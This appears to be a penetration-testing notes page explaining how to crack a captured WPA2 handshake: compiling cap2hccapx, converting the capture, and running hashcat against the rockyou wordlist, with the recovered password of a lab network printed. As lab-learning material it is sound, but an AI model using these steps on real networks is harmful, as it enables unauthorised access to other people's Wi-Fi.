LogoLogo
  • 🤩Welcome!
  • Buffer overflow
    • Remote Buffer Overflow
      • Crashing the Application
      • Controlling the EIP
      • Finding Bad Characters
      • Finding a Return Address
      • Generating Shellcode
      • Getting a Shell
  • Wireless Penetration Testing
    • Wifi Pineapple - Tetra
      • Setup
      • Firmware Upgrade
      • Capturing Wireless Handshake
      • Cracking WPA2 Handshake
      • PineAP
      • Modules
  • PortSwigger Labs
    • Authentication
      • Username enumeration via different responses
      • Username enumeration via subtly different responses
      • Username enumeration via response timing
  • TryHackMe
    • 🎄Advent of Cyber 3 (2021)
      • [Day 1] Save The Gifts
      • [Day 2] Elf HR Problems
      • [Day 3] Christmas Blackout
      • [Day 4] Santa's Running Behind
      • [Day 5] Pesky Elf Forum
      • [Day 6] Patch Management Is Hard
      • [Day 7] Migration Without Security
      • [Day 8] Santa's Bag of Toys
      • [Day 9] Where Is All This Data Going
  • Google Cloud Computing
    • ☁️Cloud Computing Fundamentals
      • Getting Started with Cloud Shell and gcloud
      • Creating a Virtual Machine
      • App Engine: Qwik Start - Python
      • Cloud Functions: Qwik Start - Command Line
      • Kubernetes Engine: Qwik Start
      • Set Up Network and HTTP Load Balancers
Powered by GitBook
On this page
  • Cracking
  • Compiling cap2hccapx
  • Converting
  • Cracking with .hccapx

Was this helpful?

  1. Wireless Penetration Testing
  2. Wifi Pineapple - Tetra

Cracking WPA2 Handshake

This section will cover how to crack a WPA2 handshakes captured with the previously showcased attack vector

PreviousCapturing Wireless HandshakeNextPineAP

Last updated 3 years ago

Was this helpful?

Cracking

We need to convert the captured .pcap file into .hccapx format in order to start cracking with it. There's a tool named cap2hccapx which can help us do this. However, we first need to download and compile it on our unix system.

Compiling cap2hccapx

  • Downloading Source

wget https://raw.githubusercontent.com/hashcat/hashcat-utils/master/src/cap2hccapx.c

  • Compiling Tool

gcc -o cap2hccapx cap2hccapx.c

  • Testing Tool

./cap2hccapx

Converting

Now that we have the tool compiled and ready to go, we can convert the file and prep it for cracking!

cap2hccapx E4-6F-13-FA-AD-E0_partial.pcap  capture.hccapx

Cracking with .hccapx

.\hashcat.exe -m 2500 .\hashes\capture.hccapx .\wordlists\rockyou.txt --force

e46f13faade0:c6adf262679d:Nee2.4:tinkerbell

tinkerbell is the PSK of the network in question

We were successfully able to crack the handshake and retrieve the password to the lab network!

I'll be using Hashcat for the cracking on my host machine. a post where I explain why cracking on the host machine is better 😊!

Here's